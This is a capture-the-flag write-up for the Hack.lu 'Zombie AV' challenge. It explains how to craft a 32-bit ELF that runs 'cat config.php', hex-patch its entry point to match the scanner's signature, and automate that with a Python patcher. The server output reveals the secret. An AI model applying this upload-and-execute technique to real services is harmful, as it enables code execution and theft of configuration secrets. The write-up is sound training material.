Wednesday, October 31, 2012

Hack.Lu CTF: Zombie AV

The objective of this challenge was to upload an ELF file with embedded code that would print out the key located in config.php.

The first step was to look at the source code provided in the zip file. Of particular interest are scan.php and elfparsing.php.

In elfparsing.php the code below checks the four ELF magic bytes and then byte 4 of the header (e_ident[EI_CLASS]): the service only accepts 32-bit ELF files and dies on 64-bit ones.
if($magic_0==0x7f && $magic_1==0x45 && $magic_2==0x4C && $magic_3==0x46) {
 //echo 'magic found\n';
} else {
 sec_warning();
 return -1;
}

if($magic_4==0x01) {  
 //print '32bit not supported <br>';
 return 32;
}

if($magic_4==0x02) {
 //return 64;
 die('64bit not supported');
 //sec_warning();
}

sec_warning();
In scan.php the code below disassembles the upload with objdump, takes the opcode bytes at the entry point and md5s them. To get past the signature check, the first 12 bytes at the entry point (_start, where execution begins, not main) must be
b0 01 90 90 90 90 90 90 90 90 cd 80
which is exactly the sequence spelled out in the hint comment.
$opcodes=getOpcodes($rest);
print "Entry Opcodes are: ".$opcodes;
print "\n";
print "Signature is: " . md5($opcodes);
print "\n";

/*
 * hint: zombie virus signature is
 * 8048340: b0 01                 mov    $0x1,%al
 * 8048342: 90                    nop
 * 8048343: 90                    nop
 * 8048344: 90                    nop
 * 8048345: 90                    nop
 * 8048346: 90                    nop
 * 8048347: 90                    nop
 * 8048348: 90                    nop
 * 8048349: 90                    nop
 * 804834a: cd 80                 int    $0x80
 */

/*
 *  secret zombie total signature engine is based on md5
 */
if (md5($opcodes) === 'cd53b957ec552afb39cba6daed7a9abc') {
  print "found zombie virus, trying to execute it\n";
The next step is to create an ELF file to upload to the service, and the file must still execute normally after it is patched. It has to be a 32-bit binary, so build it on a 32-bit Linux distribution (or with gcc -m32 on a 64-bit host). I made a C file whose main function contains only system("cat config.php"); the relative path is enough because, as the output further down shows, the scanner runs the upload from the directory that holds config.php. Once compiled I opened it up in IDA Pro Free edition.


Changing the size of the program would break it, because every relative reference after the insertion point would be thrown off. Conveniently, _start ends with a hlt right after the call __libc_start_main, followed by a run of nop padding, so the 12 extra bytes can be taken from there instead. I opened the ELF in a hex editor, cut 12 of those nops and re-inserted them at the start of _start (before the 31 ED of xor %ebp,%ebp), then overwrote those 12 bytes with the zombie virus signature. One more fix is needed before the file can be uploaded: call __libc_start_main is a relative call (E8 rel32, with rel32 measured from the end of the 5-byte instruction). The call has moved 12 bytes (0xC) forward while its target, the PLT stub, has not, so the displacement must become 12 more negative: -0x35 - 0xC = -0x41, i.e. E8 CB FF FF FF becomes E8 BF FF FF FF. Note that the signature itself, mov $0x1,%al; int $0x80, would be exit() if %eax were zero at the entry point; as the output below shows, the patched binary still reaches main on the challenge server, presumably because the upper bytes of %eax hold whatever the dynamic loader left there when it jumped to _start, so the syscall number is invalid, the kernel returns ENOSYS and execution falls through to the original _start. Save the file and upload it to the server.
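The hex-editor steps above can be scripted. The Python patcher below is an added example written for this writeup, not the author's tool and not part of the challenge: it maps e_entry to a file offset through the program headers, checks that the entry point really is glibc's i386 _start (xor %ebp,%ebp ... call __libc_start_main; hlt; nop padding), moves 12 bytes of that padding to the front, writes the signature from the hint there, and rewrites the call's rel32 so it still lands on the same PLT stub, asserting that neither the file size nor the call target changed. build_sample_elf() constructs a minimal ELF32 carrying the _start bytes from the objdump listing above (a constructed sample, not a compiled binary) so the script runs offline; on a real file run it as patch.py in.elf out.elf.

```python
#!/usr/bin/env python3
"""Prepend a byte signature to the entry point of a 32-bit x86 ELF while keeping
the file size unchanged and fixing up the rel32 of `call __libc_start_main`.

Added example for this writeup (not the challenge's or the author's code). It
assumes a stock glibc i386 dynamically linked binary: _start begins with
xor %ebp,%ebp and ends with `call __libc_start_main; hlt` plus nop padding.
"""
import struct

SIGNATURE = bytes.fromhex("b0 01 90 90 90 90 90 90 90 90 cd 80")  # mov $1,%al; 8x nop; int $0x80
START_PROLOGUE = bytes.fromhex("31 ed 5e 89 e1 83 e4 f0")         # xor %ebp,%ebp; pop %esi; mov %esp,%ecx; and
PT_LOAD = 1


def entry_file_offset(elf: bytes) -> int:
    """Translate e_entry of a little-endian ELF32 into a file offset via the PT_LOAD headers."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if elf[4] != 1:
        raise ValueError("only ELF32 is handled (the same restriction elfparsing.php enforces)")
    # Elf32_Ehdr after e_ident: type, machine, version, entry, phoff, shoff, flags,
    # ehsize, phentsize, phnum, shentsize, shnum, shstrndx
    h = struct.unpack_from("<HHIIIIIHHHHHH", elf, 16)
    e_entry, e_phoff, e_phentsize, e_phnum = h[3], h[4], h[8], h[9]
    for i in range(e_phnum):
        p_type, p_offset, p_vaddr, _, p_filesz = struct.unpack_from("<5I", elf, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD and p_vaddr <= e_entry < p_vaddr + p_filesz:
            return p_offset + (e_entry - p_vaddr)
    raise ValueError("e_entry is not inside any PT_LOAD segment")


def call_target_off(elf: bytes, call_off: int) -> int:
    """File offset an E8 rel32 call at call_off lands on; rel32 counts from the end of the 5-byte call."""
    return call_off + 5 + struct.unpack_from("<i", elf, call_off + 1)[0]


def patch_entry(elf: bytes, signature: bytes = SIGNATURE) -> bytes:
    """Return a copy of elf whose entry point starts with signature.

    _start moves forward by len(signature) bytes, the same number of nop padding
    bytes after its trailing hlt are dropped so nothing else moves, and the call's
    rel32 shrinks by the shift because the PLT stub it targets stays where it was.
    """
    n = len(signature)
    start = entry_file_offset(elf)
    if elf[start:start + len(START_PROLOGUE)] != START_PROLOGUE:
        raise ValueError("entry does not look like glibc's i386 _start; refusing to patch blindly")
    # Locate `call ...; hlt` (E8 xx xx xx xx F4) within the first 64 bytes of _start.
    call_off = next((o for o in range(start, min(start + 64, len(elf) - 5))
                     if elf[o] == 0xE8 and elf[o + 5] == 0xF4), None)
    if call_off is None:
        raise ValueError("no `call; hlt` sequence found after the entry point")
    hlt_off = call_off + 5
    if elf[hlt_off + 1:hlt_off + 1 + n] != b"\x90" * n:
        raise ValueError(f"need {n} nop padding bytes after _start to keep the file size")
    moved = bytearray(elf[start:hlt_off + 1])            # _start through hlt, about to shift by n
    rel_pos = call_off - start + 1
    old_rel = struct.unpack_from("<i", moved, rel_pos)[0]
    struct.pack_into("<i", moved, rel_pos, old_rel - n)   # e.g. -0x35 (CB FF FF FF) -> -0x41 (BF FF FF FF)
    patched = elf[:start] + signature + bytes(moved) + elf[hlt_off + 1 + n:]
    assert len(patched) == len(elf)
    assert call_target_off(patched, call_off + n) == call_target_off(elf, call_off)
    return patched


# Constructed sample (not a compiled binary): the _start bytes from the objdump listing,
# preceded 20 bytes earlier by a fake 16-byte PLT stub so the call keeps its rel32 of -0x35.
PLT_STUB = bytes.fromhex("ff 25 0c a0 04 08 68 00 00 00 00 e9 e0 ff ff ff")
START_CODE = bytes.fromhex(
    "31 ed 5e 89 e1 83 e4 f0 50 54 52"
    "68 00 84 04 08"     # push $0x8048400
    "68 10 84 04 08"     # push $0x8048410
    "51 56"
    "68 d4 83 04 08"     # push $main
    "e8 cb ff ff ff"     # call __libc_start_main@plt
    "f4"                 # hlt
)


def build_sample_elf(padding: int = 14) -> bytes:
    """Minimal ELF32: one R+X PT_LOAD covering the whole file, no sections, `padding` nops after _start."""
    text_off, base = 0x60, 0x08048000
    text = PLT_STUB + b"\x90" * 4 + START_CODE + b"\x90" * padding
    size = text_off + len(text)
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8                      # ELF32, LSB, version 1, SysV
    ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, base + text_off + 20,  # ET_EXEC, EM_386, entry=_start
                                 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_LOAD, 0, base, base, size, size, 5, 0x1000)
    return ehdr + phdr + b"\x00" * (text_off - len(ehdr) - len(phdr)) + text


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:                                   # patch.py in.elf out.elf
        with open(sys.argv[1], "rb") as f:
            data = f.read()
        with open(sys.argv[2], "wb") as f:
            f.write(patch_entry(data))
    else:                                                    # demo on the constructed sample
        out = patch_entry(build_sample_elf())
        off = entry_file_offset(out)
        print(out[off:off + 48].hex(" "))
```

The script refuses to touch a binary whose entry point does not match the expected prologue or whose padding is shorter than the signature, which is the failure mode of doing this by hand on a binary built with a different toolchain: the padding after hlt is alignment filler that the linker happens to leave, not something the ABI guarantees.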
analysing file 94b0f040323a591c3e3680246b7ce3ec
8048330: b0 01                 mov    $0x1,%al
8048332: 90                    nop
8048333: 90                    nop
8048334: 90                    nop
8048335: 90                    nop
8048336: 90                    nop
8048337: 90                    nop
8048338: 90                    nop
8048339: 90                    nop
804833a: cd 80                 int    $0x80
804833c: 31 ed                 xor    %ebp,%ebp
804833e: 5e                    pop    %esi
804833f: 89 e1                 mov    %esp,%ecx
8048341: 83 e4 f0              and    $0xfffffff0,%esp
8048344: 50                    push   %eax
8048345: 54                    push   %esp
8048346: 52                    push   %edx
8048347: 68 00 84 04 08        push   $0x8048400
804834c: 68 10 84 04 08        push   $
Entry Opcodes are: b0 01 90 90 90 90 90 90 90 90 cd 80 
Signature is: cd53b957ec552afb39cba6daed7a9abc
found zombie virus, trying to execute it
<?php

$readelfpath='/usr/bin/readelf';
$objdumppath='/usr/bin/objdump';
$uploadpath='upload/';
$scriptpath='/var/www/';
$secret='55c4080daefb5f794c3527101882b50b';

?>
done we are safe

Flag =55c4080daefb5f794c3527101882b50b.

-- zlouity
